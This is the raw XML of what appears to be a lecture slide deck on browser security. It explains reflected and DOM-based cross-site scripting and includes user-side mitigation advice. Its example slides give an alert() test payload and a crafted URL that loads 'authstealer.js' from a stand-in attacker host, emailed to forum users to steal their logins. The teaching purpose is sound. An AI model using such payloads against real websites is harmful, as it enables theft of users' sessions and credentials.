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8" r:id="rId10"/>
    <p:sldId id="263" r:id="rId11"/>
    <p:sldId id="269" r:id="rId12"/>
    <p:sldId id="271" r:id="rId13"/>
    <p:sldId id="272" r:id="rId14"/>
    <p:sldId id="273" r:id="rId15"/>
    <p:sldId id="266" r:id="rId16"/>
    <p:sldId id="274" r:id="rId17"/>
    <p:sldId id="275" r:id="rId18"/>
    <p:sldId id="276" r:id="rId19"/>
    <p:sldId id="277" r:id="rId20"/>
    <p:sldId id="278" r:id="rId21"/>
    <p:sldId id="279" r:id="rId22"/>
    <p:sldId id="280" r:id="rId23"/>
    <p:sldId id="281" r:id="rId24"/>
    <p:sldId id="265" r:id="rId25"/>
    <p:sldId id="26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6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717078-FB64-BE4B-9061-0770F997426F}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>26/01/18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19333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17078-FB64-BE4B-9061-0770F997426F}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>26/01/18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240933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17078-FB64-BE4B-9061-0770F997426F}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>26/01/18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392747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17078-FB64-BE4B-9061-0770F997426F}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>26/01/18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121966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17078-FB64-BE4B-9061-0770F997426F}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>26/01/18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172537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717078-FB64-BE4B-9061-0770F997426F}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>26/01/18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412686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717078-FB64-BE4B-9061-0770F997426F}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>26/01/18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119270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717078-FB64-BE4B-9061-0770F997426F}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>26/01/18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1366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17078-FB64-BE4B-9061-0770F997426F}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>26/01/18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304100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17078-FB64-BE4B-9061-0770F997426F}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>26/01/18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153290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17078-FB64-BE4B-9061-0770F997426F}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>26/01/18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2AAD5-9D9A-424E-AAD2-A218B2A1E505}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22746702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17078-FB64-BE4B-9061-0770F997426F}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>26/01/18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2AAD5-9D9A-424E-AAD2-A218B2A1E505}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="596608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Browser Security</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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15850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XSS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>When a malicious script is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>reflected</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> off of a web application to the victim’s web-browser.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The script is activated through a link, which sends a request to a website with a vulnerability that enables execution of malicious scripts.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The vulnerability is typically a result of incoming requests not being sufficiently sanitized.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="380349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6200"/>
            <a:ext cx="9144000" cy="6683979"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34437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XSS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:lumMod val="85000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>While visiting a forum site that requires users to log in to their account, a perpetrator executes this search query </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="558ED5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;script type='text/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="558ED5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="558ED5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'&gt;alert('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="558ED5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="558ED5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>');&lt;/script&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>causing the following things to occur:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The query produces an alert box saying: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="558ED5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The page displays: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;script type='text/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>'&gt;alert('XSS');&lt;/script &gt; not found</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>.”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The page's URL reads </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="558ED5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="558ED5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ecommerce.com?q</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="558ED5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=&lt;script type="text/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="558ED5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="558ED5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"&gt;alert('XSS'); &lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>This tells the perpetrator that the website is vulnerable</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="89319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XSS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Next, he creates his own URL, which reads </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="558ED5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="558ED5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>forum.com?q</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="558ED5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=news&lt;\script%20src="http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="558ED5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hackersite.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="558ED5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="558ED5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>authstealer.js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>" and embeds it as a link into a seemingly harmless email, which he sends to a group of forum users</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="311426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Reflected XSS Mitigation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>First and foremost, from the user's point-of-view, vigilance is the best way to avoid XSS scripting. Specifically, this means not clicking on suspicious links which may contain malicious code. Suspicious links include those found in:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Emails from unknown senders</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A website's comments section</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Social media feed of unknown users</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="209159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of DOM: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The Document Object Model is a convention for representing and working with objects in an HTML document (as well as in other document types).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Basically all HTML documents have an associated DOM, consisting of objects representing the document properties from the point of view of the browser.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Whenever a script is executed client-side, the browser provides the code with the DOM of the HTML page where the script runs, thus, offering access to various properties of the page and their values, populated by the browser from its perspective.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19221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a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>DOM XSS is a type of cross site scripting attack which relies on inappropriate handling, in the HTML page, of the data from its associated DOM.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Among the objects in the DOM, there are several which the attacker can manipulate in order to generate the XSS condition, and the most popular, from this perspective, are the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>document.url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>document.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>document.referrer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> objects.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="408690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 example</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Let’s take the basic example of a page which provides users with customized content, depending on their user name which is encoded in the URL, and uses their name on the resulting page:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>In this case the HTML source of </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="3100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="558ED5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3100" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="558ED5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>www.example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="558ED5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3100" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="558ED5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>userdashboard.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>would look like this:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="81379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316" y="1354667"/>
            <a:ext cx="8815916" cy="3598333"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="217316" y="437444"/>
            <a:ext cx="6233753" cy="517881"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="217316" y="5475111"/>
            <a:ext cx="8089174" cy="476956"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="137681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491" y="3162300"/>
            <a:ext cx="8432800" cy="533400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="114459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r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Web Server</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:solidFill>
            <a:schemeClr val="accent6">
              <a:lumMod val="60000"/>
              <a:lumOff val="40000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Serves content</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Static</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Dynamic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Server-side scripts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Fetch content from files/database/other containers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Browser</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:lumMod val="40000"/>
              <a:lumOff val="60000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Represents content</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Static (HTML)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Dynamic (XML, ASP, JSP)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Client-side scripts (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>JScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Agnostic to server side complexities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>DOM (document object model)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>http, ftp, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nfs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vnc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, et al.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="Straight Connector 7"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4574470" y="1535113"/>
            <a:ext cx="0" cy="5125331"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:lumMod val="7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86115" y="6321780"/>
            <a:ext cx="3762005" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="85000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Other network components: DNS, etc.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
